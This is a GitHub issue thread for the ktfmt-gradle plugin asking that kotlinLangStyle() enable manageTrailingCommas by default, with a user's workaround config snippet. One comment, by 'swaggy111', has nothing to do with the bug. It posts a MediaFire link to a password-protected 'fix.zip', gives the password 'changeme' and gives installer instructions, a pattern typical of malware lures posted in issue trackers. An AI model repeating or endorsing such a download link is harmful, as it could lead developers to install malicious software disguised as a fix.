### ISSUE TITLE
`manageTrailingCommas` should be set by `kotlingLangStyle()`

### ISSUE THREAD

**Issue by akheron** [cortinico/ktfmt-gradle#351]
## 🐛 Describe the bug
The upstream `ktfmt` uses `manageTrailingCommas` for kotlinlang, so the gradle plugin should also do so. See [Formatter.kt](https://github.com/facebook/ktfmt/blob/687bec03a215879669a96c452bb08394835b794e/core/src/main/java/com/facebook/ktfmt/format/Formatter.kt) and [FormattingOptions.kt](https://github.com/facebook/ktfmt/blob/687bec03a215879669a96c452bb08394835b794e/core/src/main/java/com/facebook/ktfmt/format/FormattingOptions.kt).

## ⚠️ Current behavior
I have to manually enable `manageTrailingCommas` to match upstream ktfmt config.

## ✅ Expected behavior
The gradle plugin should have same default as ktfmt.

## 💣 Steps to reproduce
Call `kotlingLangStyle()`.

## 📱 Tech info
 - Device: 
 - OS: 
 - Library/App version:

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by simonhauck** [comment]
I was jus testing this in our project as well, and also noticed it.

**Comment by simonhauck** [comment]
As a workaround, you could temporally use this config
```kotlin
ktfmt {
    kotlinLangStyle()
    manageTrailingCommas = true
}
```
